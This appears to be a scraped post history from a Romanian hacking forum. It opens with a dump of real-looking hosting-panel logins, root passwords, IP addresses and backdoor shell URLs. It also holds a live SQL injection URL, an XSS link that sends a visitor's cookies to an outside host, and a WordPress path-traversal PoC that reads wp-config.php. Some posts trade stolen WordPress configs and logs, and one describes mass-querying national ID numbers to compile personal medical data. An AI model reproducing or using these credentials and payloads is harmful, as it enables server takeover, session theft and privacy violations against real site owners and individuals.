9bAYgz4i96 devilx.in 170LdoFnv7 jkaromania.ro jkaroman 5P5Pz4tm8m radioprostul.ro radiopro hr17e4G6uI 750c3qXxCv 6ek5lTJ28g gamer-video.com gamervid 4Hw64m5Lde kmichel18 1vandam1 7tc7uS3V8v csblue.in csbluein z4tTWn4i27 radiovibe.in radiovib 8xzQe55C7l 6jqX52uL6h jocuri123.ro jocuriro blackwolf counterstrikego.ro csgo cshellworld.com cshellwo Q54nToz1l2 as3nF8Nc19 e5ov0XT24q cs-deathland.in csdeathl 8k6Zb29Trj brailamusic.ro brailamu misu123misu lovitii.eu lovitiie 22evmU1Wf5 4ODcix89u7 sa2Y8Kp03f dozamortala.com dozamort m8kJwN170y progame.ro minedarea.ro minedare 4hXznb6M94 resursecs.ro resursec 121995sorin wdpixel.com google.ro Rr4Qej77q8 playstrike.net playstri 6Tq6s0dl0D l86Od8Cjb4 irealworld.ro irealwor rS3p48tu9E romaniagame.ro romaniag 1Qo2wheV34 piFO4wd233 jigodii.ro jigodiir 5vwyIP470s nVision gamecpx001 16Phuf1Ru3 q8Y6pm6Y6k zw1jqAB802 58dqc0gT7J lg46CVf76l 4dO8o50boY R77hXk3f3c 84Efy8Vmc6 mangaliacs.ro mangalia 5sE1fum9M1 hb21s3CG2o e0w3P1o6Lf Ynd56b3a0N xcs.ro xcsro1 fa9w2B5Lf4 kappahosting.in kappahos kappah0st OgbRo5305p ct4u3FZ1s8 O5B9q7sht1 PwnS73ca66 5Fq06H7ied cinemaon.ro cinemaon oMav5Im457 hcclan.info gajik.com gajikcom ei9RE40m6h 8sBb83p7Hg R3guw4E9i4 D0W3fj4p5t o32vqY3kC8 oriG3H05z2 1szbFH1s75 1ssbd11C0M anime-sub.ro animesub Z04pj21zKu 1xEYc73a6s i2U00lQ1dk if73w8s8JL luluxady adyxlulu oficialcs.ro Y4u8Mp2zf2 gU8b35N9my P80nL8a8mn 7dPa50hxF9 2eS445Wsya ndsY954O6x tgz.ro tgzro 9Wx4Ynr52u invision-amxmodx.net invision basina323 V188Vb4bku 9q7X5Vhq3x stelistcristi narro. andr33y berline modjo petrisor Y4Zc7sbl84 Hu028vSqm1 Jr78G3fwn9 0g98NI1ibj alecsia.net alecsian e0I0a6Y9rz costica enache199120 force-zone.ro depositphotos.ro depositp ZdwCd057c9 neogames.ro uxZU1hv697 2l7k2P9Vxy daniel danieltest gamer-video.com 3nod lollipo0p pici admin01 themephpfusion.ro themephp 1jqw9XK3q1 extreme-play.ro extremep gN47U9yk6n wdpixel.com wdpixelc Yc154q9hsG alcool catalin01 wdpixel.com Bogyzor01 nokia000 roforge.com roforgec 0d8sar81ZG roweed.com idealcs.in 9L1r2vz3tJ meci24.info meciinfo 5Dmf800Cbu skygamingdr babuscala djspeedy nemancatu123 muzicafly.net muzicafl 5xkuL30w0Z mascatii.ro mascati1 i8kLMue087 allthat streetballer294 thedarckdragon21 descjet qR77tzIi29 ionut gabbyionut2000 Op6k2U7z1g kill4fun.ro killfunr portocala Puffy m2r12n master mastersireload anakin danger 5e01TcB0al slm freetorrent sp3ktra virgil!((* us94jh55OG liquid4cs sigridutza g-area.ro garearo p5K1vd1Ei7 http://aiurea.net/filme/forum/back.php?t-t http://clienti.extreamshop.com/status/index.php?t-t /home/xhldscom/public_html/clienti/aff.php http://dynamicspace.ro/ssnet/black.php ///////http://x-hlds.com////////// Stefan : secret123 api : daniela123 marius : 0761818602 ticu : 19651974 Type Active IP Address username Password cpanel 1 188.212.104.197 base secret123 solusvmpro 1 188.212.104.200 Y3qHcChCPjNK5dzxyuQ1 N2Rs3vkdPV7CNn0Qhjvr centovacast 1 93.115.203.37 admin bunica ////////////////////////////gazduire24///////////////// http://inculori.com/forum/?t-t http://areacore.ro/tracker/whoi.php //////////////////100mbps.ro////////////////// http://huntmt2.ro/index.php?t-t cpanel 1 176.223.123.168 root MaZaRtOs@2012 whmsonic 1 176.223.119.153 root linuxredradio castcontrol 1 85.17.183.225 admin ZV4D2K.F http://sollazer.com.br/adm/destaques/img/thumbs/dom.pl cpanel 1 176.223.123.168 root MaZaRtOs@2012 95.64.36.135 xhlds853 HyGMAfH0IQ gamecp 1 188.241.14.75 ciprian steaua gamecp 0 82.77.230.94 admin aifon cpanel 1 af.gazduire24.net xhldscom ciprian123 gamecp 1 188.241.14.60 johnny andrei1992 http://tfmi.upg-ploiesti.ro/cv.php?id=-14 union select 1,database(),3,4,5,6,7,8,9,10,11,12-- http://tfmi.upg-ploiesti.ro/include/general.php?t-t http://www.radmin.ro/bitrix/tools/imagepg.php?img="""><a href="javascript:void(document.location='http://crisalixx.summerhost.info/1.png?photo=%27+%20document.cookie)">Click Me</a> sv1.rien.ro.rien.ro root DascaluAndrei123 188.241.154.233 188.241.154.234 188.241.154.235 188.241.154.236 188.241.154.237 188.241.154.238 188.241.154.239 188.241.154.240 188.241.154.241 188.241.154.242 188.241.154.243 188.241.154.244
  9. L-am gasit pe 2-3 site-uri dar toate indicau "download manager" si defapt e document_manager.. detaliile fiind scrise tot despre "download manager" .. don't get it... Long story short: #Tip exploit: Arbitrary file download #Posibil autor: hugo.s@linuxmail.org #Data publica: 27-10-2014 # PoC : http://host/wp-content/plugins/document_manager/views/file_download.php?fname=../../wp-config.php
  10. Backdoor Shell - Wikipedia, the free encyclopedia Ai grija la ce script uploadezi fiindca el poate fi modificat de cineva si tu la randul tau sa fii o victima.
  11. Password shown in the "code" is crypted with <check the hint>, solve the hint and find the encryption method.
  12. Diferenta e ca daca donezi ceva face 2 face poti sa iti faci o parere despre omu respectiv, poate ca il vezi in necesitate de acel bun pe care tu il oferi. (iti faci o parere despre el daca ti se pare sarac etc) Asa pe un forum stai si te gandesti ca poate tu ii trimiti si ala face bisnita cu ele pe olx, asa intr-un utilizator cu o anumita reputatie ai avea incredere ca nu e un bisnitar.
  13. Descifreaza hintu si afla metoda de cryptare.
  14. 100 fresh wordpress configs Daunload Parola: ??????? ? ?? ??? ? ??? Hint: It is believed to be the first species of coffee to be cultivated PS: cine doreste mai multe, PM
  15. Nice... hai sa luam un demo website din VS2010 de ASP.NET , ii schimbam DB-ul , cateva selecturi drop-down, niste texte un SELECT , o treaba... hai cu milioanele de euro. Sa facem un calcul la cel mai grosolan mod: 10 000 E - servere 2 000 E - proiectarea DB 1 000 E - realizarea site-ului inspirat din demo-ul acela 5 000 E - inserarea datelor in sistem Total 18 000 E, hai sa zicem 20 000 (desi sa fim realisti, e exagerat tot ce am zis) , totusi.. 36 mil euro? =)) Si vine omu asta si zice ca ne da 15 bitcoin si 0,5 daca ii si explicam cum sa repare vulnerabilitatile... Iesi acas'
  16. Ok, deci tu defapt vrei un security audit, macar zi asa de la inceput. Scris cu picioarele pentru ca: Ai 1000 de <script> uri deschise, se vede ca unele sunt copiate / inspirate din altceva fiindca odata deschizi ghilimele simple, odata duble etc <script type='text/javascript'>... <script type="text/javascript">... De cand tagurile <td> se inchid in acelasi tag asa cum e aici, da, poate ca unele browsere nu fac gura fiindca s-au obisnuit stupid-proof, dar e retardat... : <td class="label" /> Au fost doar 2 exemple simple. Dupa o cautare, se pare ca aplicatia a fost facuta dupa un "demo" ASP.NET din vs 2010, cu date de conectare la db modificate si inca 2-3 texte probabil, deci, miroase a incepatori. Sa mai intreb cati bani s-au platit pe saracia asta?
  17. De unde stim noi ca tu nu esti creatorul sau administratorul magariei de site scrisa cu picioarele si vrei sa verifici daca ai vuln pe site, ai 1 post si user inregistrat azi probabil. Asta confirma destul de mult ceea ce am zis mai sus, deci, daca vreti un audit de securitate la site, ziceti frate direct asa. Sa scoti daca asiguratii sunt sau nu asigurati medical nu e greu, faci un script cu un captcha-sniper si il rulezi pe toate cnp-urile, apoi concatenezi rezultatele cu o baza de date de cnp -> date personale ...
  18. Gio33

    Log-uri

    Invatati si voi sa cititi hint-urile si sa aplicati, va trebuie un minim de cunostinte pentru dezlegare. Oricum stati linistiti ca nu e mare rahat in log-urile alea, metinarii o sa fie fericiti.
  19. Parerea mea, haine de dama aduse din dragonu rosu, cautat furnizori chinezi etc de chestii frumoase, mai ales daca o femeie se va ocupa de magazin, cu atat mai bine ... Multa reclama pe facebook.
  20. Faza asta e de multi ani, a revenit iar moda ?
  21. Cel mai probabil a pus mana vreun copilas pe un script de autopost ceva pe bloguri, luat de pe forum ceva, si a lasat asa mailu, oricum nu conteaza mailu ce-l treci la un comment, ideea e sa apara linku si sa nu aiba rel="nofollow". Deci.. neinteresant.
  22. A fost confirmat ca teapa de multe site-uri cu dovezi. Felicitari celor ce si au comandat orice, sunteti niste romani adevarati.
  23. Orice ar fi, sunt degeaba deja, dropbox a bagat un hard reset password la login. Iar daca incerci sa accesezi mailu, deja au incercat altii si conturile respective de mail sunt blocate. Thx for the share anyway
  24. Trebuie 10k+ ip-uri ca sa ai sperante la ceva.
×
×
  • Create New...